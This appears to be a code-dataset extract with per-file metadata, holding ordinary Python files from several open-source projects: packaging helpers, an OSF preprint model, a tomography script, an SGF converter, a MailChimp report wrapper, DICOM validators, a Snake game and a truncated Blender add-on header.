repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
mbrukman/libcloud | libcloud/utils/dist.py | 57 | 4973 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Taken From Twisted Python which licensed under MIT license
# https://github.com/powdahound/twisted/blob/master/twisted/python/dist.py
# https://github.com/powdahound/twisted/blob/master/LICENSE
import os
import fnmatch
# Names that are excluded from globbing results:
EXCLUDE_NAMES = ['{arch}', 'CVS', '.cvsignore', '_darcs',
'RCS', 'SCCS', '.svn']
EXCLUDE_PATTERNS = ['*.py[cdo]', '*.s[ol]', '.#*', '*~', '*.py']
def _filter_names(names):
"""
Given a list of file names, return those names that should be copied.
"""
names = [n for n in names
if n not in EXCLUDE_NAMES]
# This is needed when building a distro from a working
# copy (likely a checkout) rather than a pristine export:
for pattern in EXCLUDE_PATTERNS:
names = [n for n in names
if not fnmatch.fnmatch(n, pattern) and not n.endswith('.py')]
return names
def relative_to(base, relativee):
"""
Gets 'relativee' relative to 'basepath'.
i.e.,
>>> relative_to('/home/', '/home/radix/')
'radix'
>>> relative_to('.', '/home/radix/Projects/Twisted')
'Projects/Twisted'
The 'relativee' must be a child of 'basepath'.
"""
basepath = os.path.abspath(base)
relativee = os.path.abspath(relativee)
if relativee.startswith(basepath):
relative = relativee[len(basepath):]
if relative.startswith(os.sep):
relative = relative[1:]
return os.path.join(base, relative)
raise ValueError("%s is not a subpath of %s" % (relativee, basepath))
def get_packages(dname, pkgname=None, results=None, ignore=None, parent=None):
"""
Get all packages which are under dname. This is necessary for
Python 2.2's distutils. Pretty similar arguments to getDataFiles,
including 'parent'.
"""
parent = parent or ""
prefix = []
if parent:
prefix = [parent]
bname = os.path.basename(dname)
ignore = ignore or []
if bname in ignore:
return []
if results is None:
results = []
if pkgname is None:
pkgname = []
subfiles = os.listdir(dname)
abssubfiles = [os.path.join(dname, x) for x in subfiles]
if '__init__.py' in subfiles:
results.append(prefix + pkgname + [bname])
for subdir in filter(os.path.isdir, abssubfiles):
get_packages(subdir, pkgname=pkgname + [bname],
results=results, ignore=ignore,
parent=parent)
res = ['.'.join(result) for result in results]
return res
def get_data_files(dname, ignore=None, parent=None):
"""
Get all the data files that should be included in this distutils Project.
'dname' should be the path to the package that you're distributing.
'ignore' is a list of sub-packages to ignore. This facilitates
disparate package hierarchies. That's a fancy way of saying that
the 'twisted' package doesn't want to include the 'twisted.conch'
package, so it will pass ['conch'] as the value.
'parent' is necessary if you're distributing a subpackage like
twisted.conch. 'dname' should point to 'twisted/conch' and 'parent'
should point to 'twisted'. This ensures that your data_files are
generated correctly, only using relative paths for the first element
of the tuple ('twisted/conch/*').
The default 'parent' is the current working directory.
"""
parent = parent or "."
ignore = ignore or []
result = []
for directory, subdirectories, filenames in os.walk(dname):
resultfiles = []
for exname in EXCLUDE_NAMES:
if exname in subdirectories:
subdirectories.remove(exname)
for ig in ignore:
if ig in subdirectories:
subdirectories.remove(ig)
for filename in _filter_names(filenames):
resultfiles.append(filename)
if resultfiles:
for filename in resultfiles:
file_path = os.path.join(directory, filename)
if parent:
file_path = file_path.replace(parent + os.sep, '')
result.append(file_path)
return result
| apache-2.0 | 4,766,146,444,383,373,000 | 35.837037 | 78 | 0.647899 | false | 3.931225 | false | false | false |
caseyrollins/osf.io | osf/models/preprint_service.py | 2 | 13310 | # -*- coding: utf-8 -*-
import urlparse
import logging
from dirtyfields import DirtyFieldsMixin
from django.db import models
from django.utils import timezone
from django.contrib.contenttypes.fields import GenericRelation
from django.core.exceptions import ValidationError
from framework.exceptions import PermissionsError
from osf.models.nodelog import NodeLog
from osf.models.mixins import ReviewableMixin
from osf.models import OSFUser
from osf.utils.fields import NonNaiveDateTimeField
from osf.utils.workflows import ReviewStates
from osf.utils.permissions import ADMIN
from osf.utils.requests import DummyRequest, get_request_and_user_id, get_headers_from_request
from website.notifications.emails import get_user_subscriptions
from website.notifications import utils
from website.preprints.tasks import update_or_enqueue_on_preprint_updated
from website.project.licenses import set_license
from website.util import api_v2_url
from website.identifiers.clients import CrossRefClient, ECSArXivCrossRefClient
from website import settings, mails
from osf.models.base import BaseModel, GuidMixin
from osf.models.identifiers import IdentifierMixin, Identifier
from osf.models.mixins import TaxonomizableMixin
from osf.models.spam import SpamMixin
logger = logging.getLogger(__name__)
class PreprintService(DirtyFieldsMixin, SpamMixin, GuidMixin, IdentifierMixin, ReviewableMixin, TaxonomizableMixin, BaseModel):
SPAM_CHECK_FIELDS = set()
provider = models.ForeignKey('osf.PreprintProvider',
on_delete=models.SET_NULL,
related_name='preprint_services',
null=True, blank=True, db_index=True)
node = models.ForeignKey('osf.AbstractNode', on_delete=models.SET_NULL,
related_name='preprints',
null=True, blank=True, db_index=True)
is_published = models.BooleanField(default=False, db_index=True)
date_published = NonNaiveDateTimeField(null=True, blank=True)
original_publication_date = NonNaiveDateTimeField(null=True, blank=True)
license = models.ForeignKey('osf.NodeLicenseRecord',
on_delete=models.SET_NULL, null=True, blank=True)
identifiers = GenericRelation(Identifier, related_query_name='preprintservices')
preprint_doi_created = NonNaiveDateTimeField(default=None, null=True, blank=True)
date_withdrawn = NonNaiveDateTimeField(default=None, null=True, blank=True)
withdrawal_justification = models.TextField(default='', blank=True)
ever_public = models.BooleanField(default=False, blank=True)
class Meta:
unique_together = ('node', 'provider')
permissions = (
('view_preprintservice', 'Can view preprint service details in the admin app.'),
)
def __unicode__(self):
return '{} preprint (guid={}) of {}'.format('published' if self.is_published else 'unpublished', self._id, self.node.__unicode__() if self.node else None)
@property
def verified_publishable(self):
return self.is_published and self.node.is_preprint and not (self.is_retracted or self.node.is_deleted)
@property
def primary_file(self):
if not self.node:
return
return self.node.preprint_file
@property
def is_retracted(self):
return self.date_withdrawn is not None
@property
def article_doi(self):
if not self.node:
return
return self.node.preprint_article_doi
@property
def preprint_doi(self):
return self.get_identifier_value('doi')
@property
def is_preprint_orphan(self):
if not self.node:
return
return self.node.is_preprint_orphan
@property
def deep_url(self):
# Required for GUID routing
return '/preprints/{}/'.format(self._primary_key)
@property
def url(self):
if (self.provider.domain_redirect_enabled and self.provider.domain) or self.provider._id == 'osf':
return '/{}/'.format(self._id)
return '/preprints/{}/{}/'.format(self.provider._id, self._id)
@property
def absolute_url(self):
return urlparse.urljoin(
self.provider.domain if self.provider.domain_redirect_enabled else settings.DOMAIN,
self.url
)
@property
def absolute_api_v2_url(self):
path = '/preprints/{}/'.format(self._id)
return api_v2_url(path)
@property
def should_request_identifiers(self):
return not self.node.all_tags.filter(name='qatest').exists()
@property
def has_pending_withdrawal_request(self):
return self.requests.filter(request_type='withdrawal', machine_state='pending').exists()
@property
def has_withdrawal_request(self):
return self.requests.filter(request_type='withdrawal').exists()
def has_permission(self, *args, **kwargs):
return self.node.has_permission(*args, **kwargs)
def set_primary_file(self, preprint_file, auth, save=False):
if not self.node.has_permission(auth.user, ADMIN):
raise PermissionsError('Only admins can change a preprint\'s primary file.')
if preprint_file.target != self.node or preprint_file.provider != 'osfstorage':
raise ValueError('This file is not a valid primary file for this preprint.')
existing_file = self.node.preprint_file
self.node.preprint_file = preprint_file
# only log if updating the preprint file, not adding for the first time
if existing_file:
self.node.add_log(
action=NodeLog.PREPRINT_FILE_UPDATED,
params={
'preprint': self._id
},
auth=auth,
save=False
)
if save:
self.save()
self.node.save()
def set_published(self, published, auth, save=False):
if not self.node.has_permission(auth.user, ADMIN):
raise PermissionsError('Only admins can publish a preprint.')
if self.is_published and not published:
raise ValueError('Cannot unpublish preprint.')
self.is_published = published
if published:
if not (self.node.preprint_file and self.node.preprint_file.target == self.node):
raise ValueError('Preprint node is not a valid preprint; cannot publish.')
if not self.provider:
raise ValueError('Preprint provider not specified; cannot publish.')
if not self.subjects.exists():
raise ValueError('Preprint must have at least one subject to be published.')
self.date_published = timezone.now()
self.node._has_abandoned_preprint = False
# In case this provider is ever set up to use a reviews workflow, put this preprint in a sensible state
self.machine_state = ReviewStates.ACCEPTED.value
self.date_last_transitioned = self.date_published
# This preprint will have a tombstone page when it's withdrawn.
self.ever_public = True
self.node.add_log(
action=NodeLog.PREPRINT_INITIATED,
params={
'preprint': self._id
},
auth=auth,
save=False,
)
if not self.node.is_public:
self.node.set_privacy(
self.node.PUBLIC,
auth=None,
log=True
)
self._send_preprint_confirmation(auth)
if save:
self.node.save()
self.save()
def set_preprint_license(self, license_detail, auth, save=False):
license_record, license_changed = set_license(self, license_detail, auth, node_type='preprint')
if license_changed:
self.node.add_log(
action=NodeLog.PREPRINT_LICENSE_UPDATED,
params={
'preprint': self._id,
'new_license': license_record.node_license.name
},
auth=auth,
save=False
)
if save:
self.save()
def set_identifier_values(self, doi, save=False):
self.set_identifier_value('doi', doi)
self.preprint_doi_created = timezone.now()
if save:
self.save()
def get_doi_client(self):
if settings.CROSSREF_URL:
if self.provider._id == 'ecsarxiv':
return ECSArXivCrossRefClient(base_url=settings.CROSSREF_URL)
return CrossRefClient(base_url=settings.CROSSREF_URL)
else:
return None
def save(self, *args, **kwargs):
first_save = not bool(self.pk)
saved_fields = self.get_dirty_fields() or []
old_subjects = kwargs.pop('old_subjects', [])
if saved_fields:
request, user_id = get_request_and_user_id()
request_headers = {}
if not isinstance(request, DummyRequest):
request_headers = {
k: v
for k, v in get_headers_from_request(request).items()
if isinstance(v, basestring)
}
user = OSFUser.load(user_id)
if user:
self.check_spam(user, saved_fields, request_headers)
if not first_save and ('ever_public' in saved_fields and saved_fields['ever_public']):
raise ValidationError('Cannot set "ever_public" to False')
ret = super(PreprintService, self).save(*args, **kwargs)
if (not first_save and 'is_published' in saved_fields) or self.is_published:
update_or_enqueue_on_preprint_updated(preprint_id=self._id, old_subjects=old_subjects, saved_fields=saved_fields)
return ret
def _get_spam_content(self, saved_fields):
spam_fields = self.SPAM_CHECK_FIELDS if self.is_published and 'is_published' in saved_fields else self.SPAM_CHECK_FIELDS.intersection(
saved_fields)
content = []
for field in spam_fields:
content.append((getattr(self.node, field, None) or '').encode('utf-8'))
if self.node.all_tags.exists():
content.extend([name.encode('utf-8') for name in self.node.all_tags.values_list('name', flat=True)])
if not content:
return None
return ' '.join(content)
def check_spam(self, user, saved_fields, request_headers):
if not settings.SPAM_CHECK_ENABLED:
return False
if settings.SPAM_CHECK_PUBLIC_ONLY and not self.node.is_public:
return False
if 'ham_confirmed' in user.system_tags:
return False
content = self._get_spam_content(saved_fields)
if not content:
return
is_spam = self.do_check_spam(
user.fullname,
user.username,
content,
request_headers,
)
logger.info("Preprint ({}) '{}' smells like {} (tip: {})".format(
self._id, self.node.title.encode('utf-8'), 'SPAM' if is_spam else 'HAM', self.spam_pro_tip
))
if is_spam:
self.node._check_spam_user(user)
return is_spam
def _check_spam_user(self, user):
self.node._check_spam_user(user)
def flag_spam(self):
""" Overrides SpamMixin#flag_spam.
"""
super(PreprintService, self).flag_spam()
self.node.flag_spam()
def confirm_spam(self, save=False):
super(PreprintService, self).confirm_spam(save=save)
self.node.confirm_spam(save=save)
def confirm_ham(self, save=False):
super(PreprintService, self).confirm_ham(save=save)
self.node.confirm_ham(save=save)
def _send_preprint_confirmation(self, auth):
# Send creator confirmation email
recipient = self.node.creator
event_type = utils.find_subscription_type('global_reviews')
user_subscriptions = get_user_subscriptions(recipient, event_type)
if self.provider._id == 'osf':
logo = settings.OSF_PREPRINTS_LOGO
else:
logo = self.provider._id
context = {
'domain': settings.DOMAIN,
'reviewable': self,
'workflow': self.provider.reviews_workflow,
'provider_url': '{domain}preprints/{provider_id}'.format(
domain=self.provider.domain or settings.DOMAIN,
provider_id=self.provider._id if not self.provider.domain else '').strip('/'),
'provider_contact_email': self.provider.email_contact or settings.OSF_CONTACT_EMAIL,
'provider_support_email': self.provider.email_support or settings.OSF_SUPPORT_EMAIL,
'no_future_emails': user_subscriptions['none'],
'is_creator': True,
'provider_name': 'OSF Preprints' if self.provider.name == 'Open Science Framework' else self.provider.name,
'logo': logo,
}
mails.send_mail(
recipient.username,
mails.REVIEWS_SUBMISSION_CONFIRMATION,
mimetype='html',
user=recipient,
**context
)
| apache-2.0 | 7,554,843,069,861,371,000 | 37.247126 | 162 | 0.615101 | false | 4.075321 | false | false | false |
jonwright/ImageD11 | sandbox/ftomo.py | 1 | 4480 |
from __future__ import print_function
import math, numpy, time
from ImageD11 import cImageD11
from fabio.openimage import openimage
print("Using class version")
class fourier_radial(object):
""" Cache results for re-use where possible on next layer """
def __init__(self, dims, theta=None):
self.dims = dims
self.theta = theta
if self.theta is not None:
assert len(self.theta) == dims[1]
self.theta = numpy.array(theta)*numpy.pi/180.0
self.make_indices()
def set_theta(self, theta):
"""
th is the list of angles in degrees of the projections
assumed 1 degree steps otherwise
"""
self.theta = theta
assert len(self.theta) == self.dims[1]
self.theta = numpy.array(theta)*numpy.pi/180.0
self.make_indices()
def make_indices(self):
arshape = self.dims[0]/2+1, self.dims[1]
nv = (arshape[0]-1)*2
nh = arshape[0]
print("NV,NH",nv,nh)
self.ftimshape = (nv, nh)
self.ftimlen = nv*nh
n1 = (self.dims[0]/2+1)*self.dims[1]
xv = numpy.arange(0, self.dims[0]/2+1, 1,
dtype=numpy.float32 )
# dimensions?
cth = numpy.cos( self.theta ) # 1D
sth = numpy.sin( self.theta ) # 1D
ia = numpy.round(numpy.outer( cth, xv )).astype(numpy.int)
ja = numpy.round(numpy.outer( sth, xv )).astype(numpy.int)
on = numpy.array([1.0],numpy.float32)
jm = numpy.where(ja < 0, -on, on)
numpy.multiply( ia, jm, ia ) # if j<0: i=-i
numpy.multiply( ja, jm, ja ) # if j<0: j=-j
# if j<0: f=f.conj()
ia = numpy.where( ia < 0, nv+ia, ia)
inds = (ia*nh + ja).ravel()
self.conjer = jm
self.inds = inds
nim = numpy.zeros( ( nv* nh), numpy.float32 )
wons = numpy.ones( (len(inds)), dtype=numpy.float32 )
# This is now more dense - bincount?
cImageD11.put_incr( nim , inds, wons )
nim = nim.astype(numpy.int)
self.nim_div = nim + (nim==0)
def process_sinogram( self,
sinogram,
do_interpolation=False):
"""
sinogram is from the data
dimensions [npixels, nangles]
do_interp - tries to fill in some of the missing data in
fourier space
returns the radon transform
"""
assert sinogram.shape == self.dims
ar = numpy.fft.rfft(sinogram, axis=0)
faprojr = (ar.T.real.astype(numpy.float32))
faprojc = (ar.T.imag.astype(numpy.float32))
numpy.multiply( faprojc, self.conjer, faprojc)
fimr = numpy.zeros( self.ftimlen , numpy.float32 )
fimc = numpy.zeros( self.ftimlen , numpy.float32 )
cImageD11.put_incr( fimr, self.inds, faprojr.ravel())
cImageD11.put_incr( fimc, self.inds, faprojc.ravel())
fim = fimr + fimc*1j
fim = numpy.divide( fimr + fimc*1j, self.nim_div)
fim.shape = self.ftimshape
return fim
def sino2im(self, sinogram, centrepixel ):
# Take out high frequency in mean (some ring artifacts)
s = sinogram
cp = centrepixel
d = numpy.concatenate( ( s[cp:,:], s[:cp,:], ), axis=0)
im = self.process_sinogram( d , centrepixel )
# figure out what the scale factor really is
ret = numpy.fft.irfft2( im ) * im.shape[0] * im.shape[1]
ret = numpy.fft.fftshift( ret )
return ret
if __name__=="__main__":
import sys
if len(sys.argv) != 5:
print("Usage: sinogram startangle step centrepixel")
sys.exit()
fname = sys.argv[1]
star = time.time()
sino = openimage( fname )
na,nx = sino.data.shape
start = float(sys.argv[2])
step = float(sys.argv[3])
centrepixel = int( sys.argv[4] )
end = na*step + start
print("start, step, end",start, step, end)
angles = numpy.arange(start, end, step)
assert len(angles) == na,"%d %d ... %d"%(nx,na,len(angles))
print("%.2f setup"%(time.time()-star))
d = sino.data.T[:1200]
o = fourier_radial( d.shape, angles )
start = time.time()
im = o.sino2im( d, centrepixel )
sino.data = im
sino.write(fname+"_r", force_type=numpy.float32)
import pylab
pylab.imshow(im, interpolation='nearest',aspect='auto')
pylab.show()
print("per image",time.time()-start)
| gpl-2.0 | 561,290,789,958,171,500 | 33.728682 | 68 | 0.561607 | false | 3.150492 | false | false | false |
yenw/computer-go-dataset | Tom/Converter_Tom.py | 1 | 2988 | #!/bin/python
# encoding=utf8
import sys
import platform
def kifu_converter(index_name, user_id, kifu_folder, save_folder):
f = open(index_name)
stack = []
save_index = ""
for line in f:
line = line.decode('utf-8')
line_r = line.split('\t')
if line_r[2] != user_id and line_r[3] != user_id:
continue
save_index += line
Num = line_r[0]
fn_sgf = line_r[1][0:4] + "-" + line_r[1][5:7]
DT = line_r[1]
PW = line_r[2]
PB = line_r[3]
RE = line_r[5]
RO = line_r[6]
TM = line_r[7].split(' ')[1][0:-2] + " min"
OT = line_r[7].split(' ')[0]
OT = OT.split('/')[1] + "x " + OT.split('/')[0] + " sec"
SGF = "(;CA[UTF-8]GM[1]FF[4]AP[converter]\nSZ[19]"
SGF += "GN[" + Num + "]\n"
SGF += "DT[" + DT + "]\n"
SGF += "PB[" + PB + "]" + "BR[9d]\n"
SGF += "PW[" + PW + "]" + "WR[9d]\n"
SGF += "RE[" + RE + "]"
SGF += "RO[" + RO + "]"
SGF += "KM[6.5]"
SGF += "RU[Japanese]"
SGF += "TM[" + TM + "]" + "OT[" + OT + "]\n"
SGF += "PC[Tom]"
stack.append([SGF, fn_sgf, Num])
f.close()
writer = open(user_id + ".index", "w")
writer.write(save_index.encode('utf-8'))
writer.close()
if platform.platform() == "Windows":
if kifu_folder[-1] != "\\":
kifu_folder += "\\"
if save_folder[-1] != "\\":
save_folder += "\\"
else:
if kifu_folder[-1] != "/":
kifu_folder += "/"
if save_folder[-1] != "/":
save_folder += "/"
i = 0
stack_size = len(stack)
while i < stack_size:
info = stack[i]
SGF = info[0]
fn_sgf = info[1]
fn_open = fn_sgf
Num = info[2]
f_sgf = open(kifu_folder + fn_sgf)
for line_sgf in f_sgf:
line_sgf = line_sgf.decode('utf-8')
split = line_sgf.split('\t')
if split[0] == Num:
SGF += split[1] + ")"
writer = open(save_folder + Num + ".SGF", "w")
writer.write(SGF.encode('utf-8'))
writer.close()
if i + 1 >= stack_size:
break
if fn_open != stack[i + 1][1]:
break
i += 1
info = stack[i]
SGF = info[0]
fn_sgf = info[1]
Num = info[2]
f_sgf.close()
i += 1
if len(sys.argv) != 5:
print "usage: python Converter_Tom.py Kifu.index user_id kifu_folder save_folder"
print "example: python Converter_Tom.py Kifu.index 930115 kifu save"
else:
index_name = sys.argv[1]
user_id = sys.argv[2]
kifu_folder = sys.argv[3]
save_folder = sys.argv[4]
kifu_converter(index_name, user_id, kifu_folder, save_folder)
| gpl-3.0 | -1,515,790,253,295,045,600 | 28.489796 | 85 | 0.422691 | false | 2.990991 | false | false | false |
mckesson-uspharmamarketing/mailchimp-API-handler | mailchimp_api_wrapper.py | 1 | 4261 | from __future__ import division
import json
import mailchimp3
from mailchimp3 import MailChimp
from user_login_credentials import user_name
from user_login_credentials import api_key
class single_report:
def __init__(self, report_data):
self.campaign_id = report_data['id']
self.subject_line = report_data['subject_line']
self.list_name = report_data['list_name']
self.send_time = report_data['send_time']
self.total_sent = report_data['emails_sent']
self.total_bounces = report_data['bounces']['hard_bounces'] + report_data['bounces']['soft_bounces'] + report_data['bounces']['syntax_errors']
self.hard_bounces = report_data['bounces']['hard_bounces']
self.soft_bounces = report_data['bounces']['soft_bounces']
self.total_delivered = self.total_sent - self.total_bounces
self.unsubscribes = report_data['unsubscribed']
self.total_opens = report_data['opens']['opens_total']
self.unique_opens = report_data['opens']['unique_opens']
self.total_clicks = report_data['clicks']['clicks_total']
self.unique_clicks = report_data['clicks']['unique_clicks']
self.send_date = self.send_time[0:10]
self.delivery_rate = str(self.total_delivered / self.total_sent * 100) + "%"
self.open_rate = str("%.2f" % (report_data['opens']['open_rate'] * 100)) + "%"
self.click_rate = str("%.2f" % (report_data['clicks']['click_rate'] * 100)) + "%"
self.clickthru_rate = str("%.2f" % (self.total_clicks / self.total_delivered * 100)) + "%"
#self.click_report = ""
def reports_result(date_range, campaign_name_search):
client = MailChimp(user_name, api_key)
all_json_data = client.reports.all(get_all=True)
all_reports = all_json_data['reports']
reports_in_daterange = all_reports#[0:50] # TODO: create new method find_index_for_date_range to handle a simple string date range input and provide the right index number for this filter
matching_reports = [reports for reports in reports_in_daterange if campaign_name_search in reports["campaign_title"]]
return matching_reports
"""
def get_click_report(campaign_id):
client = MailChimp(user_name, api_key)
json_data = client.reports.click_details.all(campaign_id=campaign_id, get_all=False)
click_report = json_data['urls_clicked']
return click_report
"""
class click_report_object():
def __init__(self, c_id):
client = MailChimp(user_name, api_key)
json_data = client.reports.click_details.all(campaign_id=c_id, get_all=False)
links_clicked = json_data['urls_clicked']
self.url_1 = links_clicked[0]["url"]
self.total_clicks_1 = links_clicked[0]["total_clicks"]
self.total_click_percent_1 = links_clicked[0]["click_percentage"]
self.unique_clicks_1 = links_clicked[0]["unique_clicks"]
self.unique_click_percent_1 = links_clicked[0]["unique_click_percentage"]
self.url_2 = links_clicked[1]["url"]
self.total_clicks_2 = links_clicked[1]["total_clicks"]
self.total_click_percent_2 = links_clicked[1]["click_percentage"]
self.unique_clicks_2 = links_clicked[1]["unique_clicks"]
self.unique_click_percent_2 = links_clicked[1]["unique_click_percentage"]
self.url_3 = links_clicked[2]["url"]
self.total_clicks_3 = links_clicked[2]["total_clicks"]
self.total_click_percent_3 = links_clicked[2]["click_percentage"]
self.unique_clicks_3 = links_clicked[2]["unique_clicks"]
self.unique_click_percent_3 = links_clicked[2]["unique_click_percentage"]
self.url_4 = links_clicked[3]["url"]
self.total_clicks_4 = links_clicked[3]["total_clicks"]
self.total_click_percent_4 = links_clicked[3]["click_percentage"]
self.unique_clicks_4 = links_clicked[3]["unique_clicks"]
self.unique_click_percent_4 = links_clicked[3]["unique_click_percentage"]
self.url_5 = links_clicked[4]["url"]
self.total_clicks_5 = links_clicked[4]["total_clicks"]
self.total_click_percent_5 = links_clicked[4]["click_percentage"]
self.unique_clicks_5 = links_clicked[4]["unique_clicks"]
self.unique_click_percent_5 = links_clicked[4]["unique_click_percentage"]
self.url_6 = links_clicked[5]["url"]
self.total_clicks_6 = links_clicked[5]["total_clicks"]
self.total_click_percent_6 = links_clicked[5]["click_percentage"]
self.unique_clicks_6 = links_clicked[5]["unique_clicks"]
self.unique_click_percent_6 = links_clicked[5]["unique_click_percentage"] | apache-2.0 | 3,937,751,821,937,486,300 | 46.355556 | 188 | 0.711101 | false | 2.892736 | false | false | false |
scaramallion/pynetdicom | pynetdicom/_validators.py | 1 | 2079 | """Validation functions used by pynetdicom"""
from collections import OrderedDict
import logging
from typing import Union, Dict, Optional, cast, Tuple
import unicodedata
from pydicom.dataset import Dataset
from pydicom.uid import UID
LOGGER = logging.getLogger('pynetdicom._validators')
def validate_ae(value: str) -> Tuple[bool, str]:
"""Return ``True`` if `value` is a conformant **AE** value.
An **AE** value:
* Must be no more than 16 characters
* Leading and trailing spaces are not significant
* May only use ASCII characters, excluding ``0x5C`` (backslash) and all
control characters
Parameters
----------
value : str
The **AE** value to check.
Returns
-------
Tuple[bool, str]
A tuple of (bool, str), with the first item being ``True`` if the
value is conformant to the DICOM Standard and ``False`` otherwise and
the second item being a short description of why the validation failed
or ``''`` if validation was successful.
"""
if not isinstance(value, str):
return False, "must be str"
if len(value) > 16:
return False, "must not exceed 16 characters"
# All characters use ASCII
if not value.isascii():
return False, "must only contain ASCII characters"
# Unicode category: 'Cc' is control characters
invalid = [c for c in value if unicodedata.category(c)[0] == 'C']
if invalid or '\\' in value:
return False, "must not contain control characters or backslashes"
return True, ''
def validate_ui(value: UID) -> Tuple[bool, str]:
from pynetdicom import _config
if not isinstance(value, str):
return False, "must be pydicom.uid.UID"
value = UID(value)
if _config.ENFORCE_UID_CONFORMANCE:
if value.is_valid:
return True, ""
return False, "UID is non-conformant"
if not 0 < len(value):
return False, "must not be an empty str"
if not len(value) < 65:
return False, "must not exceed 64 characters"
return True, ""
| mit | 3,829,577,689,415,675,400 | 26 | 78 | 0.643098 | false | 4.068493 | false | false | false |
chenchiyuan/hawaii | hawaii/apps/commodity/signals.py | 1 | 1434 | # -*- coding: utf-8 -*-
# __author__ = chenchiyuan
from __future__ import division, unicode_literals, print_function
from django.db.models.signals import m2m_changed
def commodity_inventory_changed(sender, instance, *args, **kwargs):
from libs.datetimes import dates_during
from hawaii.apps.commodity.models import CommodityProduct, CommodityInventory
inventory = CommodityInventory.objects.select_related().get(pk=instance.pk)
weekdays = inventory.days.values_list("number", flat=True)
dates = dates_during(from_date=inventory.begin, to_date=inventory.end, weekdays=weekdays)
copy_dates = dates[:]
products = list(inventory.products.all())
products_will_delete = []
for product in products:
if not product.datetime.date in copy_dates:
products_will_delete.append(product.id)
else:
dates.remove(product.date)
# delete products
CommodityProduct.objects.filter(id__in=products_will_delete).delete()
# create products
CommodityProduct.bulk_create_products(inventory, dates)
def register_commodity_inventory_changed():
from hawaii.apps.commodity.models import CommodityInventory
m2m_changed.connect(commodity_inventory_changed, sender=CommodityInventory.days.through, dispatch_uid='commodity_inventory_changed')
def register_commodity_signals():
register_commodity_inventory_changed()
print("commodity signal register") | bsd-3-clause | -6,126,397,034,087,340,000 | 35.794872 | 136 | 0.735704 | false | 3.686375 | false | false | false |
umbc-hackafe/sign-drivers | python/games/snake.py | 1 | 2701 | import graphics
import driver
import game
import random
class Snake(game.Game):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.reset()
def reset(self):
self.sprites.clear()
self.playing = True
self.snake = [graphics.Rectangle(1, 1, x=7, y=7)]
self.direction = (1,0)
self.sprites.add(self.snake[0])
self.food = graphics.Rectangle(1, 1, x=17, y=7)
self.sprites.add(self.food)
self.count = 0
def loop(self):
if self.playing:
if 'a' in self.keys and not self.direction[0]:
self.direction = (-1, 0)
elif 'd' in self.keys and not self.direction[0]:
self.direction = (1, 0)
if 's' in self.keys and not self.direction[1]:
self.direction = (0, 1)
elif 'w' in self.keys and not self.direction[1]:
self.direction = (0, -1)
self.count = (self.count + 1) % 2
if not self.count:
for i in range(len(self.snake) - 1, 0, -1):
self.snake[i].x = self.snake[i-1].x
self.snake[i].y = self.snake[i-1].y
self.snake[0].x += self.direction[0]
self.snake[0].y += self.direction[1]
poses = set((s.x, s.y) for s in self.snake[1:])
if (self.snake[0].x < 0 or self.snake[0].x >= 112
or self.snake[0].y < 0 or self.snake[0].y >= 15
or (self.snake[0].x, self.snake[0].y) in poses):
self.sprites.clear()
self.sprites.add(graphics.TextSprite(
'GAME OVER. LEN:{}'.format(len(self.snake)),
width=5, height=7))
self.sprites.add(graphics.TextSprite(
'R TO RELOAD'.format(len(self.snake)),
width=5, height=7, y=8))
self.playing = False
if (self.snake[0].x, self.snake[0].y) == (self.food.x, self.food.y):
self.snake.append(self.food)
poses.add((self.snake[0].x, self.snake[0].y))
nx, ny = random.randrange(0, 112), random.randrange(0, 15)
while (nx,ny) in poses:
nx, ny = random.randrange(0, 112), random.randrange(0, 15)
self.food = graphics.Rectangle(1, 1, x=nx, y=ny)
self.sprites.add(self.food)
else:
if 'r' in self.keys:
self.reset()
super().loop()
GAME = Snake
| mit | -1,034,839,308,905,894,900 | 35.013333 | 84 | 0.466124 | false | 3.620643 | false | false | false |
dmsurti/reynolds-blender | reynolds_blender/models.py | 1 | 6371 | #------------------------------------------------------------------------------
# Reynolds-Blender | The Blender add-on for Reynolds, an OpenFoam toolbox.
#------------------------------------------------------------------------------
# Copyright|
#------------------------------------------------------------------------------
# Deepak Surti ([email protected])
# Prabhu R (IIT Bombay, [email protected])
# Shivasubramanian G (IIT Bombay, [email protected])
#------------------------------------------------------------------------------
# License
#
# This file is part of reynolds-blender.
#
# reynolds-blender is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# reynolds-blender is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with reynolds-blender. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
# -----------
# bpy imports
# -----------
import bpy, bmesh
from bpy.props import (StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
PointerProperty,
IntVectorProperty,
FloatVectorProperty,
CollectionProperty
)
from bpy.types import (Panel,
Operator,
PropertyGroup,
UIList
)
from bpy.path import abspath
from mathutils import Matrix, Vector
# --------------
# python imports
# --------------
import operator
import os
# ------------------------
# reynolds blender imports
# ------------------------
from reynolds_blender.gui.register import register_classes, unregister_classes
from reynolds_blender.gui.attrs import set_scene_attrs, del_scene_attrs
from reynolds_blender.gui.custom_operator import create_custom_operators
from reynolds_blender.gui.renderer import ReynoldsGUIRenderer
from reynolds_blender.sphere import SearchableSphereAddOperator
from reynolds_blender.add_block import BlockMeshAddOperator
# ----------------
# reynolds imports
# ----------------
